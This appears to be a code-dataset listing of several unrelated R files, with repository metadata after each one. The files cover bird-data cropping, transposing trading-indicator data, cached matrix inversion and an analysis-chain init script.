newSHPPath <- "/home/tmichele/Documents/GitHub/birdsBECzonesBC/modules/prepingInputs/data/province_state_lcc.shp"
newSHP <- readOGR(newSHPPath)
naStates <- subset(newSHP, is.na(STATE))
studyAreaToCrop <- sp::spTransform(studyAreaToCrop, CRSobj = LambertsConformalConic)
studyAreaToCropSHP <- sp::spTransform(naStates, CRSobj = epsg4267) #and also tested all other projections...
plot(studyAreaToCrop) #or nStates
plot(points, add= TRUE , col = 'red', pch = 19, cex = 0.5) #or pointsTrans with vegMap plot
# ============= ALL FAILED SO FAR ======================
xmin <- raster::extent(studyAreaToCrop)[1]
xmax <- raster::extent(studyAreaToCrop)[2]
ymin <- raster::extent(studyAreaToCrop)[3]
ymax <- raster::extent(studyAreaToCrop)[4]
birdData2 <- birdData[birdData$X>xmin & birdData$X<xmax &
birdData$Y>ymin & birdData$Y<ymax,] # THERE ARE POINTS (Nicole's map showed it!), I JUST DONT KNOW WHY THESE ARE NOT BEING SELECTED...
if (nrow(birdData)==0){
stop("The selected area doesn't contain data. Try increasing the area.")
}
return(birdData)
} |
## FUNCTION create_transposed_data
## PURPOSE: function gets indicator data in each column
## it is splitting this data by periods and transpose the data.
## additionally it is label the data based on the simple logic assigning it to 2 categories based on the difference
## between beginning and end of the vector
## finally it is stacking all data and joining everything into the table
## TEST:
# library(tidyverse)
# library(lubridate)
# pathT2 <- "C:/Program Files (x86)/FxPro - Terminal2/MQL4/Files/"
# macd <- read_csv(file.path(pathT2, "AI_Macd1.csv"), col_names = F)
# macd$X1 <- ymd_hms(macd$X1)
# write_rds(macd, "test_data/macd.rds")
#' Create Transposed Data
#' https://www.udemy.com/self-learning-trading-robot/?couponCode=LAZYTRADE7-10
#'
#' @param x - data set containing a table where 1st column is a Time index and other columns containing financial asset indicator values
#' @param n - number of rows we intend to split and transpose the data
#'
#' @return function returns transposed data. Transposed values from every column are stacked one to each other
#' @export
#'
#' @examples
#'
create_transposed_data <- function(x, n = 50){
require(tidyverse)
#n <- 50
#x <- read_rds("test_data/macd.rds")
nr <- nrow(x)
dat11 <- x %>% select(-1) %>% split(rep(1:ceiling(nr/n), each=n, length.out=nr)) #list
dat11[length(dat11)] <- NULL
# operations within the list
for (i in 1:length(dat11)) {
#i <- 1
if(!exists("dfr12")){
dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as.tibble() } else {
dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as.tibble() %>% bind_rows(dfr12)
}
}
return(dfr12)
}
| /create_transposed_data.R | permissive | surapoom/R_selflearning | R | false | false | 1,710 | r | ## FUNCTION create_transposed_data
## PURPOSE: function gets indicator data in each column
## it is splitting this data by periods and transpose the data.
## additionally it is label the data based on the simple logic assigning it to 2 categories based on the difference
## between beginning and end of the vector
## finally it is stacking all data and joining everything into the table
## TEST:
# library(tidyverse)
# library(lubridate)
# pathT2 <- "C:/Program Files (x86)/FxPro - Terminal2/MQL4/Files/"
# macd <- read_csv(file.path(pathT2, "AI_Macd1.csv"), col_names = F)
# macd$X1 <- ymd_hms(macd$X1)
# write_rds(macd, "test_data/macd.rds")
#' Create Transposed Data
#' https://www.udemy.com/self-learning-trading-robot/?couponCode=LAZYTRADE7-10
#'
#' @param x - data set containing a table where 1st column is a Time index and other columns containing financial asset indicator values
#' @param n - number of rows we intend to split and transpose the data
#'
#' @return function returns transposed data. Transposed values from every column are stacked one to each other
#' @export
#'
#' @examples
#'
create_transposed_data <- function(x, n = 50){
require(tidyverse)
#n <- 50
#x <- read_rds("test_data/macd.rds")
nr <- nrow(x)
dat11 <- x %>% select(-1) %>% split(rep(1:ceiling(nr/n), each=n, length.out=nr)) #list
dat11[length(dat11)] <- NULL
# operations within the list
for (i in 1:length(dat11)) {
#i <- 1
if(!exists("dfr12")){
dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as.tibble() } else {
dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as.tibble() %>% bind_rows(dfr12)
}
}
return(dfr12)
}
|
## The makeCacheMatrix function takes a given matrix and creates a special
## matrix that has an inverse to be calculated. The cacheSolve function
## will take the special matrix, find its inverse and store the inverse
## into a cache. This will allow the inverse to be quickly found later if
## asked for, avoiding the timely process of calculating the inverse again.
## The first function, makeCacheMatrix, takes a matrix as its argument.
## It first initializes the inverse, 'i', to NULL. Nested in the function is
## the function 'set', which puts the matrix and its inverse into the parent
## environment. The function 'get' then returns the matrix. The function
## 'setinverse' initiates the inverse to 'i' in the parent environment. The
## function 'getinverse' then prints the inverse matrix 'i'. Lastly, the
## function creates a list to set all of the nested functions to their
## names, which allowsbfor the use of the '$' operator if desired.
makeCacheMatrix <- function(x = matrix()) {
i <- NULL
set <- function(y){
x <<- y
i <<- NULL
## '<<-' operator puts x and i in parent environment
}
get <- function() x
setinverse <- function(solve) i <<- solve
## set i to the inverse in the parent environment
getinverse <- function() i
list(set = set, get = get, setinverse = setinverse,
getinverse = getinverse)
## setting the names allows us to use '$' operator
}
## The second function, cacheSolve, takes a matrix of the type
## makeCacheMatrix() as its argument. This means the original matrix must
## be the result of the previous makeCacheMatrix function. It first
## initializes 'i' to the inverse. If the inverse is not NULL, it will be
## returned from the cache. If the inverse is NULL (meaning it hasn't been
## calculated previously), the solve function will calculate the inverse of
## the matrix and initialize it to 'i'. 'i' will then be set as the inverse
## for the matrix in the cache. The inverse will then be printed out.
cacheSolve <- function(x, ...) {
i <- x$getinverse()
if(!is.null(i)) {
message("getting cached data")
return(i)
}
## If the inverse is in the cache, it will be printed out
data <- x$get()
i <- solve(data, ...)
x$setinverse(i)
i
}
| /cachematrix.R | no_license | RosieVE/ProgrammingAssignment2 | R | false | false | 2,416 | r | ## The makeCacheMatrix function takes a given matrix and creates a special
## matrix that has an inverse to be calculated. The cacheSolve function
## will take the special matrix, find its inverse and store the inverse
## into a cache. This will allow the inverse to be quickly found later if
## asked for, avoiding the timely process of calculating the inverse again.
## The first function, makeCacheMatrix, takes a matrix as its argument.
## It first initializes the inverse, 'i', to NULL. Nested in the function is
## the function 'set', which puts the matrix and its inverse into the parent
## environment. The function 'get' then returns the matrix. The function
## 'setinverse' initiates the inverse to 'i' in the parent environment. The
## function 'getinverse' then prints the inverse matrix 'i'. Lastly, the
## function creates a list to set all of the nested functions to their
## names, which allowsbfor the use of the '$' operator if desired.
makeCacheMatrix <- function(x = matrix()) {
i <- NULL
set <- function(y){
x <<- y
i <<- NULL
## '<<-' operator puts x and i in parent environment
}
get <- function() x
setinverse <- function(solve) i <<- solve
## set i to the inverse in the parent environment
getinverse <- function() i
list(set = set, get = get, setinverse = setinverse,
getinverse = getinverse)
## setting the names allows us to use '$' operator
}
## The second function, cacheSolve, takes a matrix of the type
## makeCacheMatrix() as its argument. This means the original matrix must
## be the result of the previous makeCacheMatrix function. It first
## initializes 'i' to the inverse. If the inverse is not NULL, it will be
## returned from the cache. If the inverse is NULL (meaning it hasn't been
## calculated previously), the solve function will calculate the inverse of
## the matrix and initialize it to 'i'. 'i' will then be set as the inverse
## for the matrix in the cache. The inverse will then be printed out.
cacheSolve <- function(x, ...) {
i <- x$getinverse()
if(!is.null(i)) {
message("getting cached data")
return(i)
}
## If the inverse is in the cache, it will be printed out
data <- x$get()
i <- solve(data, ...)
x$setinverse(i)
i
}
|
# sqldf options.
# driver is set to SQLLite in order to read from dataframe
# https://code.google.com/p/sqldf/#Troubleshooting
options(
gsubfn.engine = "R",
sqldf.driver = "SQLite"
)
#**
#* Check if the execution of a task returned an error
#**
checkError <- function(e) {
if (inherits(e, "try-error") || inherits(e, "simpleError")) {
print("ARENA-ERROR", quote = F)
stop(e)
}
}
#**
#* Extracts the content of a file and returns it as an SQL quoted string
#**
arena.getQuotedFileContent <- function(filename) {
# TODO
# newLinePlaceHolder <- 'ARENA_NEW_LINE_PLACEHOLDER'
#
# filePath <- paste(scriptDir, filename, sep = .Platform$file.sep)
#
# c <- file(filePath, encoding = "UTF-8")
# fileContent <- paste(readLines(c, warn = F), collapse = newLinePlaceHolder)
# close(c)
#
# fileContent <- dbQuoteString(conn = connection, x = fileContent)
# fileContent <- gsub(newLinePlaceHolder, '\n', fileContent)
#
# return(fileContent)
}
# processing chain starting time
arena.startTime <- Sys.time()
| /server/modules/analysis/service/rChain/rFile/system/init-chain.R | permissive | Dawa406/arena | R | false | false | 1,037 | r | # sqldf options.
# driver is set to SQLLite in order to read from dataframe
# https://code.google.com/p/sqldf/#Troubleshooting
options(
gsubfn.engine = "R",
sqldf.driver = "SQLite"
)
#**
#* Check if the execution of a task returned an error
#**
checkError <- function(e) {
if (inherits(e, "try-error") || inherits(e, "simpleError")) {
print("ARENA-ERROR", quote = F)
stop(e)
}
}
#**
#* Extracts the content of a file and returns it as an SQL quoted string
#**
arena.getQuotedFileContent <- function(filename) {
# TODO
# newLinePlaceHolder <- 'ARENA_NEW_LINE_PLACEHOLDER'
#
# filePath <- paste(scriptDir, filename, sep = .Platform$file.sep)
#
# c <- file(filePath, encoding = "UTF-8")
# fileContent <- paste(readLines(c, warn = F), collapse = newLinePlaceHolder)
# close(c)
#
# fileContent <- dbQuoteString(conn = connection, x = fileContent)
# fileContent <- gsub(newLinePlaceHolder, '\n', fileContent)
#
# return(fileContent)
}
# processing chain starting time
arena.startTime <- Sys.time()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.